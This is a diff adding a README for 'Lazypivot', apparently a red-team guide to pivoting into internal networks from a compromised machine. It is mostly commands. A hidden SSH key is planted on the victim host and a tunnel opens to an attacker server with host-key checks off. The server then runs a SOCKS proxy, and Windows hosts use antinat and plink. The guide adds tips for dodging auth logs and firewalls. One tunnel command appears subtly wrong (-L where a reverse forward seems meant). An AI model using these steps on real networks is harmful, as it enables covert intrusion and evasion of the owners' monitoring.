|
@@ -0,0 +1,61 @@
|
|
|
+# Lazypivot
|
|
|
+Making pivoting into internal networks easier and faster so you can focus on the real fun :)
|
|
|
+
|
|
|
+## Principles
|
|
|
+The idea is to executa a socks5 server on the compromised target and forward the local exposed port remotely via SSH.
|
|
|
+A remote server or any other mean of exposing a port on the internet is required. When SSH server is not available there's [antinat](http://www.malsmith.net/antinat/) coming to the rescue.
|
|
|
+
|
|
|
+## Linux
|
|
|
+### Simpler
|
|
|
+On our server
|
|
|
+```
|
|
|
+useradd -m -s /bin/nologin targetname
|
|
|
+ssh-keygen -t ecdsa -f /tmp/sshkey -q -N ""
|
|
|
+mkdir /home/targetname/.ssh
|
|
|
+cp /tmp/sshkey.pub /home/targetname/.ssh/authorized_keys
|
|
|
+chown -R targetname:targetname /home/targetname/.ssh
|
|
|
+chmod 600 /home/targetname/.ssh/authorized_keys
|
|
|
+cat /tmp/sshkey
|
|
|
+```
|
|
|
+
|
|
|
+Copy the content of /tmp/sshkey
|
|
|
+
|
|
|
+On the compromised host
|
|
|
+
|
|
|
+```
|
|
|
+echo "my copied sshkey" >> /tmp/.keyfile
|
|
|
+chmod 600 /tmp/.keyfile
|
|
|
+ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -L 22:127.0.0.1:2222 -i /tmp/.keyfile -fNT targetname@myserver
|
|
|
+```
|
|
|
+
|
|
|
+Now on your server
|
|
|
+
|
|
|
+```
|
|
|
+ssh -D 0.0.0.0:8080 compromiseduser@127.0.0.1 -p 2222 -fNT
|
|
|
+```
|
|
|
+
|
|
|
+### Stealthier
|
|
|
+We can combine the `antinat` proxy with the above procedure in order not to login onn the ssh server and thus writing on the auth logs.
|
|
|
+
|
|
|
+Instead of using with the socks options, upload the provided package and directly forward the `antinat` port.
|
|
|
+## Windows
|
|
|
+
|
|
|
+Upload the package and extract it with 7z.exe.
|
|
|
+
|
|
|
+Start the antinat binary, no admin permissions are required:
|
|
|
+
|
|
|
+```
|
|
|
+antinat.exe -a -cantinat.xml
|
|
|
+```
|
|
|
+
|
|
|
+Forward the antinat port with plink:
|
|
|
+
|
|
|
+```
|
|
|
+plink -ssh -noagent -pw "password" -L 32768:127.0.0.1:8080 targetname@myserver
|
|
|
+```
|
|
|
+
|
|
|
+
|
|
|
+## Tips
|
|
|
+
|
|
|
+ * Make ssh listen on port 443 to be less suspicious and bypass lame firewall rules
|
|
|
+ * [User corkscrew for SSH via HTTP Proxy](https://github.com/bryanpkc/corkscrew)
|